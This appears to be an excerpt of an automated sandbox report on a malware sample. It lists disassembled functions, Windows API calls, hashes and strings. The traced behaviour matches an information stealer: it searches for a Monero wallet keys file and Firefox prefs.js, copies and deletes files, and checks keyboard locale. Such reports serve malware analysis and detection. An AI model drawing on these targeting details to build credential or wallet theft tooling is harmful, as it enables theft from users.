                    • Opcode Fuzzy Hash: e4f54af50c9d9357a074d626f89c35ac5805bcc69167709a393652a57e4d1b75
                    • Instruction Fuzzy Hash: 996144B1510218AFCB24EBA1DC49FEA73BCFB58700F0485D9B509A6141EB75DB89CFA1
                    Function 00BD4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BD4580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD4587
                    • wsprintfA.USER32 ref: 00BD45A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD45BD
                    • StrCmpCA.SHLWAPI(?,00BE0FC4), ref: 00BD45EB
                    • StrCmpCA.SHLWAPI(?,00BE0FC8), ref: 00BD4601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD468B
                    • FindClose.KERNEL32(000000FF), ref: 00BD46A0
                    • lstrcat.KERNEL32(?,013CE9A8), ref: 00BD46C5
                    • lstrcat.KERNEL32(?,013CD760), ref: 00BD46D8
                    • lstrlen.KERNEL32(?), ref: 00BD46E5
                    • lstrlen.KERNEL32(?), ref: 00BD46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 7d328a28b13d0fad1feec0d074913b5bfc18aaab360e891c30d42ad9ac86b7f0
                    • Instruction ID: dac94d5308f87b5af8db3a7396accfb29b8a28cfb4d6bc5d87e904d199f1ea4b
                    • Opcode Fuzzy Hash: 7d328a28b13d0fad1feec0d074913b5bfc18aaab360e891c30d42ad9ac86b7f0
                    • Instruction Fuzzy Hash: CB5143B555021C9FC724EB70DC89FEDB3BCAB54300F4445D9B609A2150EB75DAC88FA1
                    Function 00BD3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00BD3EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD3EDA
                    • StrCmpCA.SHLWAPI(?,00BE0FAC), ref: 00BD3F08
                    • StrCmpCA.SHLWAPI(?,00BE0FB0), ref: 00BD3F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD406C
                    • FindClose.KERNEL32(000000FF), ref: 00BD4081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: c7ac9fc45f8d75677772335ff6074ded5338e0b02be74bbd82d33404ac1f4f62
                    • Instruction ID: c97449cdcb1118e6083e409d3a586e2d9ab80a4758effb7f846e9814c2469ac3
                    • Opcode Fuzzy Hash: c7ac9fc45f8d75677772335ff6074ded5338e0b02be74bbd82d33404ac1f4f62
                    • Instruction Fuzzy Hash: E15179B5500218ABCB24FBB0DC85EEDB3BCBB54300F0485D9B659A2141EB75DB898FA1
                    Function 00BCED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00BCED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BCED55
                    • StrCmpCA.SHLWAPI(?,00BE1538), ref: 00BCEDAB
                    • StrCmpCA.SHLWAPI(?,00BE153C), ref: 00BCEDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCF2AE
                    • FindClose.KERNEL32(000000FF), ref: 00BCF2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 0c741df59fc129c8028811c2bc605827b63c51387a97fdaf6b07735e57c95f31
                    • Instruction ID: 4c9d940f4c2bf9c3fd8dbcecae7558c92d095c1a3301a7aa0415fa90253a3f39
                    • Opcode Fuzzy Hash: 0c741df59fc129c8028811c2bc605827b63c51387a97fdaf6b07735e57c95f31
                    • Instruction Fuzzy Hash: 8BE104719111589ADB54FB60CC92EEEB3BCAF54300F4045EAB40A62192FF316F8ADF56
                    Function 00BCF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BE15B8,00BE0D96), ref: 00BCF71E
                    • StrCmpCA.SHLWAPI(?,00BE15BC), ref: 00BCF76F
                    • StrCmpCA.SHLWAPI(?,00BE15C0), ref: 00BCF785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCFAB1
                    • FindClose.KERNEL32(000000FF), ref: 00BCFAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: d0d5f625b4fc16d380b1c96bbab198f630c2cfeaeee953af2d15ec224228a81a
                    • Instruction ID: 10718742893f32431eac0e05c4f89af64281dd73506a2a9178321904990090b2
                    • Opcode Fuzzy Hash: d0d5f625b4fc16d380b1c96bbab198f630c2cfeaeee953af2d15ec224228a81a
                    • Instruction Fuzzy Hash: 2FB154719001199BCB24FF64DC95FEDB3B9AF54300F4085E9A80AA6291FF316B49CF96
                    Function 00BC16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BE510C,?,?,?,00BE51B4,?,?,00000000,?,00000000), ref: 00BC1923
                    • StrCmpCA.SHLWAPI(?,00BE525C), ref: 00BC1973
                    • StrCmpCA.SHLWAPI(?,00BE5304), ref: 00BC1989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BC1D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00BC1DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BC1E20
                    • FindClose.KERNEL32(000000FF), ref: 00BC1E32
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: e0455a99d2dd95708a97dc8fe0418b7a9f5ebe826d124a91c6db1f0137348fdd
                    • Instruction ID: 1fa7172189ba321dfa883dd4914a879e11965fcfbfda815b83b845c90342a50e
                    • Opcode Fuzzy Hash: e0455a99d2dd95708a97dc8fe0418b7a9f5ebe826d124a91c6db1f0137348fdd
                    • Instruction Fuzzy Hash: 711232719101589BCB15FB60CCA6EEEB3B8AF54300F4045EAB50A62291FF356F89CF91
                    Function 00BCDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BE0C2E), ref: 00BCDE5E
                    • StrCmpCA.SHLWAPI(?,00BE14C8), ref: 00BCDEAE
                    • StrCmpCA.SHLWAPI(?,00BE14CC), ref: 00BCDEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCE3E0
                    • FindClose.KERNEL32(000000FF), ref: 00BCE3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: 1ce0c2ab5de7d506262ff0d1aaf243e8b0934260c3149ce9fb16f9b3777fd5b3
                    • Instruction ID: 769a6049ed9fcf113e8aa71a65345a4410e9e6f1a2619c751ea0a226ce4aecdb
                    • Opcode Fuzzy Hash: 1ce0c2ab5de7d506262ff0d1aaf243e8b0934260c3149ce9fb16f9b3777fd5b3
                    • Instruction Fuzzy Hash: 89F1BF718101589ADB15FB60CC95EEEB3B8BF14300F9041EAA41A72291FF356F8ADF65
                    Function 00BCDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BE14B0,00BE0C2A), ref: 00BCDAEB
                    • StrCmpCA.SHLWAPI(?,00BE14B4), ref: 00BCDB33
                    • StrCmpCA.SHLWAPI(?,00BE14B8), ref: 00BCDB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCDDCC
                    • FindClose.KERNEL32(000000FF), ref: 00BCDDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 7db94f82ff1fd6215de1d3914450a3b7297c2484b8e4e2b1b0583a0cad9ea90e
                    • Instruction ID: 5600f7d1563ef7419616018bda83c40139345399e11d957953cc1eb17885d906
                    • Opcode Fuzzy Hash: 7db94f82ff1fd6215de1d3914450a3b7297c2484b8e4e2b1b0583a0cad9ea90e
                    • Instruction Fuzzy Hash: B59148769001085BCB14FB74DC56EEDB3BCAB94300F4085F9F91AA6281FE359B498B96
                    Function 00F87DCA Relevance: 11.6, Strings: 8, Instructions: 1620COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Xo$'m|N$23G$A;w_$B~}$]%f9$u?_;$zWm
                    • API String ID: 0-2154948658
                    • Opcode ID: 654c25ee025d3a0ba96f37512eaeeca2cbd3484c1120637d48df5255280c981f
                    • Instruction ID: 8cea16275648150309f097ad6b7d814432808401b60a84fad8bf7f4c3167f6da
                    • Opcode Fuzzy Hash: 654c25ee025d3a0ba96f37512eaeeca2cbd3484c1120637d48df5255280c981f
                    • Instruction Fuzzy Hash: F5B21BF3A0C210AFE7046E2DEC8567ABBE9EFD4720F16493DE6C5C3744EA3558058692
                    Function 00BD7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,00BE05AF), ref: 00BD7BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BD7BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BD7C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BD7C62
                    • LocalFree.KERNEL32(00000000), ref: 00BD7D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: eaedcd783a91b6d99a482a79e8e4071f2a9dce4a2d04ec279b0738c99c31bea8
                    • Instruction ID: f6873298fc699ba3361e65432f99f8f8c84506359b39d27c1e7fd796ed107abc
                    • Opcode Fuzzy Hash: eaedcd783a91b6d99a482a79e8e4071f2a9dce4a2d04ec279b0738c99c31bea8
                    • Instruction Fuzzy Hash: 9A412A71950218ABDB24DB94DC99BEEF3B8FB44700F2041DAE40962291EB742F85CFA1
